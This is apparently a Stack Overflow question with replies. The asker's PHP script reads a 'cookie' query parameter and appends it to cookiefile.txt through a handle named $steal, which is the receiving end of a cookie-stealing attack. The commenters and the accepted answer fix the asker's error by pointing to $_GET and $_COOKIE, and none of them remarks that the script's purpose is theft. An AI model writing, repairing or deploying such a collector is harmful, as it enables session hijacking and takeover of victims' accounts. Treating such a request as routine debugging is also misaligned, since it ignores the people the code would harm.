# getting error in "$cookie = $HTTP_GET_VARS["cookie"];"

Tags: php

```
<?php
$cookie = $HTTP_GET_VARS["cookie"];
$steal = fopen("cookiefile.txt", "a");
fwrite($steal, $cookie ."\n");
fclose($steal);
?>
```

While executing this code I'm getting this error:

> Notice: Undefined variable: HTTP_GET_VARS in line 2

please help me out

Comment: `$HTTP_GET_VARS` has been deprecated for **LONG** time. **Don't use it**. Basically, your code was obsolete before you even wrote it.

Comment: $HTTP_GET_VARS has been replaced with $_GET

Comment: If you're looking to extract cookie data you can use `$_COOKIE[]`

Comment: See this link for more information:
http://php.net/manual/en/reserved.variables.get.php

Answer (score 5, accepted):

Your `$HTTP_GET_VARS["cookie"];` doesnt exist, that's the problem...

**Note:**

`$HTTP_GET_VARS [deprecated]` use `$_GET` instead.
Also if you are trying to get a cookie you should use [$_COOKIE["name"]](http://php.net/manual/en/reserved.variables.cookies.php)